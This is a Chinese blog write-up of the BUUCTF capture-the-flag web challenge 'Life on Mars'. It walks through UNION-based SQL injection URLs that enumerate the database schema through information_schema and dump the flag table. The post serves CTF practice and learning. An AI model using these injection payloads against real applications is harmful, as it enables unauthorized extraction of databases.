当前位置: 首页 > article >正文

81,【5】BUUCTF WEB [b01lers2020]Life on Mars

进入靶场

怎莫颠颠的,一下子就想到展博了

先把左边的挨个点一遍

在最后一个有点收获

 不过也没其他收获了

这种进去给个正常网页的题目,基本都靠url获取信息了

抓包看看有没有其他信息

竟然没有任何信息

自闭了

看别人的wp去咯

为什么别人抓到的包里面有get传参的内容,我啥也没有,怎么点也没有

???????

无所谓,我会自己加

query?search=hesperia_planum& 

直接无响应了

还少个cookie

F12也没得到

那就先看别人的wp吧,熟悉下传参的单词,字母也好

题目的原理是很简单的SQL注入,甚至没有什么过滤

/query?search=amazonis_planitia union select 1,database()

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'

/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

得到flag


http://www.kler.cn/a/520002.html

相关文章:

  • 爬山算法与模拟退火算法的全方面比较
  • 上海亚商投顾:沪指冲高回落 大金融板块全天强势 上海亚商投
  • Doris Schema Change 常见问题分析
  • webview_flutter_wkwebview3.17.0 --Cookie认证
  • 第五节 MATLAB命令
  • 2025年1月22日(什么是扫频)
  • Leetcode刷题-滑动窗口
  • Hadoop实战-电商离线数仓学习笔记4.0
  • 基于马尔可夫链和多属性决策方法的物联网生态系统信任评分预测与管理
  • 【Git版本控制器--3】Git的远程操作
  • 【Linux】OS、进程PCB、状态、进程的切换和调度,深入理解虚拟地址空间
  • 《P1208 [USACO1.3] 混合牛奶 Mixing Milk》
  • ADC和DMA原理
  • 如何优化深度学习模型来提高错别字检测准确率?
  • 如何在Python中进行数据分析?
  • JavaSE【学习笔记】
  • linux日志排查相关命令
  • 转换算术表达式
  • 2025年01月24日Github流行趋势
  • 为AI聊天工具添加一个知识系统 之63 详细设计 之4:AI操作系统 之2 智能合约
  • CLion开发Qt桌面
  • MySQL 基础学习(1):数据类型与操作数据库和数据表
  • Matlab实现TCN-LSTM时间卷积神经网络结合长短期记忆神经网络多特征分类预测(附模型研究报告)
  • gradle创建springboot单项目和多模块项目
  • C++实现设计模式---命令模式 (Command)
  • 系统架构设计中的性能优化策略